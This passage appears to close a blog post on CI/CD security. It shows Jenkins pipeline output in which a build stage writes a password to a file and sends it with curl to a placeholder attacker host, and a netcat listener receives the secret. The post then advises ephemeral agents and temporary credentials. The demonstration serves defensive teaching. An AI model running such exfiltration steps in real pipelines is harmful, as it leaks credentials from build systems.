[Pipeline] { (outputting creds)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] withCredentials
Masking supported pattern matches of $PASSWORD
[Pipeline] {
[Pipeline] writeFile
Warning: A secret was passed to "writeFile" using Groovy String interpolation, which is insecure.
Affected argument(s) used the following variable(s): [PASSWORD]
See https://jenkins.io/redirect/groovy-string-interpolation for details.
[Pipeline] sh
+ curl http://PUBLIC_IP:4444 --data @creds.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
And we receive the following connection.
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 7 53758
POST / HTTP/1.1
Host: PUBLIC_IP:4444
User-Agent: curl/8.5.0
Accept: */*
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
SuperSecretToken
So that’s it. We’ve deep dived into configuring a pipeline to build and test a go binary, build container and ship it to a registry. We’ve seen different methods to executing malicious code and the complexities of using docker for agent. Hopefully it is clear that using dedicated, ephemeral build agents reduces the risks of compromise and where possible, temporary credentials are used (such as workload identity) to integrate into other services. Next up, GitLab.